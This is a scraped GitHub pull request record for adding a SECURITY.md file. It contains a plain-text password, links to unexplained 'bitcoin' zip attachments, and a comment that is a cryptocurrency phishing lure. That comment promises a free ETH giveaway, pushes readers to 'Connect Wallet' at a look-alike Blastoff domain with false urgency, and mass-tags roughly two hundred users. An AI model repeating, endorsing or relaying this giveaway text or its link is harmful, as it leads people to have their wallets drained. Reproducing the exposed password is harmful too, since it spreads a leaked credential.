### PR TITLE
Create SECURITY.md

### PR DESCRIPTION
**Pull request by JACKEYBANKZ**
#1 
#### Password: Jordanwest545@

 --- 

 [SF|](https://softacheck.com)

 [Check out the detailed analysis on softacheck](https://softacheck.com/app/repository/JACKEYBANKZ/Blockchain/issues)

### CODE REVIEW

**Comment by JACKEYBANKZ** [comment]
[bitcoin-files-current.zip](https://github.com/JACKEYBANKZ/Blockchain/files/7438876/bitcoin-files-current.zip)
[bitcoin-metadata-current (1).zip](https://github.com/JACKEYBANKZ/Blockchain/files/7438887/bitcoin-metadata-current.1.zip)

**Comment by JACKEYBANKZ** [comment]
[bitcoin-metadata-current.zip](https://github.com/JACKEYBANKZ/Blockchain/files/7438896/bitcoin-metadata-current.zip)

**Comment by JACKEYBANKZ** [comment]
[bitcoin-files-current.zip](https://github.com/JACKEYBANKZ/Blockchain/files/7438904/bitcoin-files-current.zip)
[bitcoin-metadata-current (1).zip](https://github.com/JACKEYBANKZ/Blockchain/files/7438907/bitcoin-metadata-current.1.zip)

**Comment by isedwards** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
NamelessOne777, @EthanMerrill, @LilaMorgen, @goodluck028, @Mohadin, @ClunieClunie, @AutomationMike, @m4mm0n, @Rammelkast, @romaincaraes, @ungtsuhan, @zeddo443, @binaryannamolly, @bvan512, @mosunchao, @zorix99, @himanshulimbasiya, @beike-zh, @mahmoudeid789, @zamis, @dmicc, @sbhamad, @bynanex, @jessdonohoe, @flgk, @LargeJohnson78, @mrwenwei, @lee-ABC, @Messorem7, @kavatari, @JordanLittell, @tatmanblue, @gideonphilip, @jimmityglick, @softdream1981, @Feekoos, @W1Real, @digicatech, @misszero, @cabbage89, @eeyzs1, @mumtazhaqiqy, @pedroluz89, @prabhatdutt95, @MicrochipQ, @Yash-1511, @ddouble, @TurnHack, @riahsoc, @pocca2048abraxas1984, @ramin-guliyev, @lmalsch, @Dylan6207, @takapurio, @yaourdt, @arabporr, @Krempelj, @DaRealSheep, @ysn47, @UltraLc, @ccdevcreative, @Tynmyr, @vijayganeshpk, @pachecoder, @Lowellddh, @AnndaGH, @lcividin, @lunzhoufei, @czfadmin, @ParkWonBin, @kingfs, @we1l1n, @okg21, @KingCrab1990, @dimitriit12, @botasylum, @keshramjith, @mumtazhaqiqy, @MatteoZampariniDev, @coolejungenhihi, @wangzou1995, @puxos, @heromanba, @ulswww, @OrkunO, @GhostTW, @stevefan1999-personal, @Jerinedev, @Prat617, @Simsalaba, @solotourist, @xueenda, @bonnie-ho, @vixues, @ionuttamas, @anri-asaturov, @HydraJedi, @ricksbarbosa, @robin2010liuSaylux, @jhaustin13, @filipeoliveiraa, @nocturover, @emericoss, @ALYREZA, @ATaylor96, @brandonhon, @jwizzle218, @jtroby, @Wavelet-jc, @1haoyu, @LiaoYiWei, @hashman8433, @Simsalaba, @mrtkp9993, @Lj27ft, @g147, @shullp05, @stat-arb, @nkorkuta, @insperedia, @vilius17, @santiagorao12, @MD-V, @pjlegato, @ozzie00, @tommy-kwok, @Staszek-org, @eonward, @Avik-Jain, @senstar-rareshb, @pkgadufia2008, @vex1023, @m4mm0n, @fzuzyp, @obiknows, @19871010, @coolejungenhihi, @evanricard, @shadyvd, @GhostTW, @lmumar, @geekyayush, @notracenocase, @vvlee, @wisbech, @sunhuiIO, @fps697608, @shousexfo-0, @mengjin001, @hijoe320, @rogerhuanglife, @eeeeeson, @KNipunDananjaya, @ChickenWhisky, @sharkblue2009, @pitersong, @bvandevliet, @yashjain0, @whyrv, @stevedoss, @imghasemi, @W-D-D, @ulswww, @useric, @sigeshitou, @dobro12, @dahican, @55479266, @michaelyoukeim, @Messorem7, @yaourdt, @xavave, @atthemallnow, @qxiang88, @guition, @lailai487, @asdfghjktldr, @qweviop, @ysk-hello, @BROMOSXoo, @RJHARENBERG, @poulinjulien, @canoncodex, @jacooloff, @botasylum, @rixbeck, @Vision1224, @metashift, @AelarLiadon, @Ram9730, @AutomationMike, @kryshko, @taw420, @c-a-mcginnis, @davidrot, @m-1806, @CliffordDingshouyisxty, @mengjin001, @rparkpkcap, @hs41-18, @honsaun, @VidhiTayal, @dmicc, @AVISIX, @m-1806, @sidiyer00, @shetyeshail, @cesarnie, @SolarisYan, @RobertoEstrada, @narrorek0xd, @giwilorjelly, @adm73, @wangcanjie, @tsinovoi-mule, @binaryannamolly, @reraaaaa, @osmanbozokluoglu, @monarch22us, @LargeJohnson78, @cdeMonkey, @slkagura, @hdgj, @rickdotnet, @ccdevcreative, @He1nr1chK, @sulaimangari, @ETroll, @Algernon-dev, @woshi088, @nayukio, @HuaFangYun, @zensharp, @HardikKSavaliya, @MR-Cann, @Othmane-Sajid, @hucares, @tonyada, @saimarpaka, @samping, @SimonLuckenuik, @torrentkv, @PatrickBateman2, @DonCN, @EthanMerrill, @Blazlien

**Pull request merged**
